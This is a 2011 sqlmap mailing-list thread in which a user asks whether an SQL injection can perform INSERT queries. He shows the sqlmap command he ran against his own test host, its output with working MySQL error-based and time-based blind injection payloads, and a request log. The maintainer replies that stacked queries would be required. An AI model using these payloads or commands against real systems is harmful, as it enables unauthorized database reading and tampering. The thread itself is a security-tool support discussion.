Thread: [sqlmap-users] insert via injection
From: Kirill M. <l0...@l0...> - 2011-05-01 19:34:50
Hi,
is it possible to make "insert/update" queries via sql injection bugs?
I tried at my test machine via "--sql-query", but I didn't see the query in request_uri:

(admin@rpmbuild)-(09:03 PM Tue Apr 26)-(~/sqlmap-dev)
$ python26 sqlmap.py -u "10.0.0.60/sql/user.php?id=1" -t t3.log --sql-query="insert into users set user='aaa',pass='bbb';"

    sqlmap/1.0-dev (r3809) - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 21:07:53

[21:07:53] [INFO] using '/home/admin/sqlmap-dev/output/10.0.0.60/session' as session file
[21:07:53] [INFO] resuming injection data from session file
[21:07:53] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[21:07:53] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=1 AND (SELECT 1212 FROM(SELECT COUNT(*),CONCAT(CHAR(58,110,118,103,58),(SELECT (CASE WHEN (1212=1212) THEN 1 ELSE 0 END)),CHAR(58,117,118,99,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=1 AND SLEEP(5)
---

[21:07:53] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 5
web application technology: Apache 2.2.3, PHP 5.1.6
back-end DBMS: MySQL 5.0
do you want to retrieve the SQL statement output? [Y/n/a]
[21:07:54] [INFO] fetching SQL data manipulation query output: 'insert into users set user='aaa',pass='bbb';'
[21:07:54] [INFO] read from file '/home/admin/sqlmap-dev/output/10.0.0.60/session': None
[21:07:54] [INFO] read from file '/home/admin/sqlmap-dev/output/10.0.0.60/session': None
insert into users set user='aaa',pass='bbb'; [2]:
[*] None

[21:07:54] [INFO] Fetched data logged to text files under '/home/admin/sqlmap-dev/output/10.0.0.60'

[*] shutting down at: 21:07:54

(admin@rpmbuild)-(09:07 PM Tue Apr 26)-(~/sqlmap-dev)
$ cat t3.log
HTTP request [#1]:
GET /sql/user.php?id=1 HTTP/1.1
Accept-Encoding: identity
Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
Host: 10.0.0.60
Accept-language: en-us,en;q=0.5
Pragma: no-cache
Cache-control: no-cache,no-store
User-agent: sqlmap/1.0-dev (r3809) (http://sqlmap.sourceforge.net)
Connection: close

HTTP response [#1] (200 OK):
Content-length: 949
X-powered-by: PHP/5.1.6
Uri: http://10.0.0.60:80/sql/user.php?id=1
Server: Apache/2.2.3 (CentOS)
Connection: close
Date: Tue, 26 Apr 2011 19:07:53 GMT
Content-type: text/html; charset=UTF-8

HTTP_ACCEPT_ENCODING => identity
HTTP_ACCEPT_LANGUAGE => en-us,en;q=0.5
HTTP_CONNECTION => close
HTTP_USER_AGENT => sqlmap/1.0-dev (r3809) (http://sqlmap.sourceforge.net)
HTTP_ACCEPT_CHARSET => ISO-8859-15,utf-8;q=0.7,*;q=0.7
HTTP_HOST => 10.0.0.60
HTTP_PRAGMA => no-cache
HTTP_CACHE_CONTROL => no-cache,no-store
PATH => /sbin:/usr/sbin:/bin:/usr/bin
SERVER_SIGNATURE => <address>Apache/2.2.3 (CentOS) Server at 10.0.0.60 Port 80</address>
SERVER_SOFTWARE => Apache/2.2.3 (CentOS)
SERVER_NAME => 10.0.0.60
SERVER_ADDR => 10.0.0.60
SERVER_PORT => 80
REMOTE_ADDR => 10.0.0.60
DOCUMENT_ROOT => /var/www/html
SERVER_ADMIN => root@localhost
SCRIPT_FILENAME => /var/www/html/sql/user.php
REMOTE_PORT => 41083
GATEWAY_INTERFACE => CGI/1.1
SERVER_PROTOCOL => HTTP/1.1
REQUEST_METHOD => GET
QUERY_STRING => id=1
REQUEST_URI => /sql/user.php?id=1
SCRIPT_NAME => /sql/user.php
PHP_SELF => /sql/user.php
REQUEST_TIME => 1303844873
ok
############################################################################

--
Kirill Morozov
KIMO2-RIPE, RHCE
From: Miroslav S. <mir...@gm...> - 2011-05-01 21:11:45
Hi Kirill,

for something like this stacked queries should be supported, while you can see from your injection info that there is no stacked injection vulnerability (as a command other than select cannot be inserted into the vulnerable query).

kr

On Sun, May 1, 2011 at 9:34 PM, Kirill Morozov <l0...@l0...> wrote:
> Hi,
> is it possible to make "insert/update" queries via sql injection bugs?
> I tried at my test machine via "--sql-query", but I didn't see the query in
> request_uri:
> (admin@rpmbuild)-(09:03 PM Tue Apr 26)-(~/sqlmap-dev)
> $ python26 sqlmap.py -u "10.0.0.60/sql/user.php?id=1" -t t3.log
> --sql-query="insert into users set user='aaa',pass='bbb';"
> [...]
> sqlmap identified the following injection points with a total of 0 HTTP(s)
> requests:
> ---
> Place: GET
> Parameter: id
> Type: error-based
> Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
> Payload: id=1 AND (SELECT 1212 FROM(SELECT
> COUNT(*),CONCAT(CHAR(58,110,118,103,58),(SELECT (CASE WHEN (1212=1212) THEN
> 1 ELSE 0 END)),CHAR(58,117,118,99,58),FLOOR(RAND(0)*2))x FROM
> information_schema.tables GROUP BY x)a)
> Type: AND/OR time-based blind
> Title: MySQL > 5.0.11 AND time-based blind
> Payload: id=1 AND SLEEP(5)
> ---
> [...]

--
Miroslav Stampar
E-mail: miroslav.stampar (at) gmail.com
PGP Key ID: 0xB5397B1B